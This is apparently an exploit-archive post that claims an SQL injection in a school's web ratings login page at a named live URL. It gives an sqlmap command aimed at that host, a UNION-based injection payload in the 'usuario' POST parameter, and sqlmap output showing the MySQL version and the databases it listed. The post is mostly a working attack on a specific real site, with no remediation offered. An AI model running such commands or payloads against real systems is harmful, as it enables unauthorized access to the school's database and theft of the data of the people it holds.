# Exploit Title: Santo Domingo School (CSD) / Web Ratings | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "http://csd.atenas.tech/login.html" --form --dbs --batch
---------------------------------------------------------------------------------------------------
.tech is the internet's new generic top-level domain for IT professionals, web developers, software engineers, project managers, and UX designers.
Santo Domingo School (CSD)
Web Ratings
http://csd.atenas.tech/login.html
---
Parameter: usuario (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: usuario=rXpi' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qxqxq','mGxiNZtQyMjBiWOgBcfVyIGbwYfYUFiMVrIPuAox'),'qpjxq'),NULL,NULL,NULL-- GxFw&clave=&recuerdame=on
---
the back-end DBMS is MySQL
web application technology: PHP, Apache
the back-end DBMS: MySQL 5 (Percona fork)
banner: '5.6.41-84.1'
available databases [2]:
[+] atenaste_csd
[+] information_schema